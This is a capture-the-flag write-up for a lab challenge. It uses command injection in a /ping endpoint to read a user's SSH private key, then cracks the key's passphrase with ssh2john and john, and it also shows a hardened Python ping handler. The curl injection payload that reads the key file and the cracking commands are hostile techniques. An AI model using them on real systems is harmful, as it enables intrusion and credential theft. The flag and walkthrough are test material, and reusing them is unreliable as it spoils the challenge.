
The Iron Shell - TOKEN2

Base URL: http://target:8000

Background

SSH is exposed on the target. The task is to recover valid SSH credentials using the provided wordlist and submit them to the grader.

From Nothing to Working

Start point: only the /ping entry point and a wordlist URL are provided.

Iterations:

  1. Use /ping command injection to read user files and identify an SSH private key.
  2. Extract the key (encrypted) and save it locally as id_rsa.
  3. Convert the key to a John hash with ssh2john and crack it using the provided wordlist (with OMP_NUM_THREADS=16).
  4. Submit the recovered username/password to http://grader/ and receive the token.

Goal

Crack SSH credentials and submit them to the grader.

Commands

Extract the key:

curl -s "http://target:8000/ping?ip=127.0.0.1;cat+/home/user/.ssh/id_rsa" > id_rsa
chmod 600 id_rsa
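
Why the request above reaches the key file, and how the handler should be written instead. This is an added example, not the challenge's server code: the handler shape (a shell string built from the ip parameter) and the function names are assumptions.

```python
import ipaddress
import subprocess


def vulnerable_command(raw):
    # Assumed flawed pattern: the parameter is pasted into a shell string,
    # so ';' ends the ping command and starts a second one.
    return "ping -c 1 " + raw


def parse_ping_target(raw):
    """Return a canonical IP literal or raise ValueError."""
    # ip_address() accepts only a bare IPv4/IPv6 literal; ';', spaces,
    # '$()', backticks and newlines all fail to parse.
    addr = ipaddress.ip_address(raw)
    # Python 3.9+ accepts IPv6 zone ids ("fe80::1%eth0") and allows almost
    # any characters after '%', so refuse scoped addresses outright.
    if getattr(addr, "scope_id", None):
        raise ValueError("scoped IPv6 addresses are not accepted")
    return str(addr)


def safe_argv(raw):
    # Argument vector, never a shell string. "--" ends option parsing,
    # so the target can never be read as a ping flag.
    return ["ping", "-c", "1", "--", parse_ping_target(raw)]


def run_ping(raw):
    # shell=False (the default) passes argv straight to execve().
    return subprocess.run(safe_argv(raw), capture_output=True,
                          text=True, timeout=5)


if __name__ == "__main__":
    # Constructed inputs: the decoded value from the request above,
    # a zone-id variant, and a legitimate address.
    for value in ("127.0.0.1;cat /home/user/.ssh/id_rsa",
                  "fe80::1%;id", "127.0.0.1"):
        try:
            print("accepted:", safe_argv(value))
        except ValueError as exc:
            print("rejected:", repr(value), "-", exc)
```

Validation and the argv form are independent layers: either one alone stops this payload, and keeping both means a later change to one does not reopen the injection.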

Crack the passphrase:

ssh2john id_rsa > id_rsa.john
OMP_NUM_THREADS=16 john --wordlist=wordlist.txt id_rsa.john

Submit to grader (use the cracked values):

curl -s -X POST http://grader/ \
  -d "username=USER" -d "password=PASS"

Expected Output

Look for:

PCCC{flag2_99_7478}

Learn More